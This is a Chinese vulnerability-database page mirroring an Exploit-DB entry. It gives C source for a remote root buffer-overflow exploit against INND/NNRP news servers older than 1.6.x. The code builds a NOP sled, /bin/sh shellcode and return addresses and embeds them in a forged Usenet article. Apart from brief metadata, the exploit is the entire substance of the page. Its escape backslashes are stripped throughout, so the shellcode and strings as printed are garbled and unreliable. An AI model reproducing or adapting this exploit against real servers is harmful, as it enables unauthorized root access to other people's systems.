INND/NNRP < 1.6.x - Remote Overflow

INND/NNRP < 1.6.x – Remote Overflow

漏洞ID 1053494 漏洞类型
发布时间 2000-11-30 更新时间 2000-11-30
图片[1]-INND/NNRP < 1.6.x - Remote Overflow-安全小百科CVE编号 N/A
图片[2]-INND/NNRP < 1.6.x - Remote Overflow-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/208
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
 *  INND/NNRP remote root overflow
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

#define DEFAULT_OFFSET	792
#define BUFFER_SIZE	796
#define ADDRS		80
#define RET			0xefbf95e4
#define NOP			"x08x21x02x80"

int main(argc, argv)
int argc;
char **argv;
{
  char *buff = NULL, *ptr = NULL;
  u_long *addr_ptr = NULL;
  int ofs = DEFAULT_OFFSET;
  int noplen;
  int i, j;
  u_char execshell[] = 
    "x34x16x05x06x96xd6x05x34x20x20x08x01"
    "xe4x20xe0x08x0bx5ax02x9axe8x3fx1fxfd"
    "x08x21x02x80x34x02x01x02x08x41x04x02"
    "x60x40x01x62xb4x5ax01x54x0bx39x02x99"
    "x0bx18x02x98x34x16x04xbex20x20x08x01"
    "xe4x20xe0x08x96xd6x05x34xdexadxcaxfe"
    "/bin/sh";
  
  if(argc > 1)
    ofs = atoi(argv[1]);

  if(!(buff = malloc(4096)))
  {
    (void)fprintf(stderr, "can't allocate memoryn");
    exit(1);
  }

  ptr = buff;
  noplen = BUFFER_SIZE - strlen(execshell) - ADDRS;

  for(i = 0; i < noplen / 4; i++)
  {
    for(j = 0; j < 4; j++)
      *ptr++ = NOP[j];
  }

  *ptr += noplen;

  for(i = 0; i < strlen(execshell); i++)
    *ptr++ = execshell[i];

  addr_ptr = (unsigned long *)ptr;

  for(i = 0; i < ADDRS / 4; i++)
    *addr_ptr++ = (RET - ofs);

  ptr = (char *)addr_ptr;
  *ptr = '';

  (void)fprintf(stderr, "shellcode len: %d, RET: %xn", strlen(buff), RET-ofs);

  printf(
    "Path: babcia!padlinan"
    "From: babunia @%sn"
    "Newsgroups: pl.testn"
    "Subject: testn"
    "Message-ID: <[email protected]>n"
    "Date: 26 Aug 1999 10:36:54 +0200n"
    "Lines: 1n"
    "n"
    "west. test it.n"
    ".n", buff);
}


// milw0rm.com [2000-11-30]

相关推荐: Internet Security Systems ICECap Manager Default Username and Password Vulnerability

Internet Security Systems ICECap Manager Default Username and Password Vulnerability 漏洞ID 1104202 漏洞类型 Access Validation Error 发布时…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享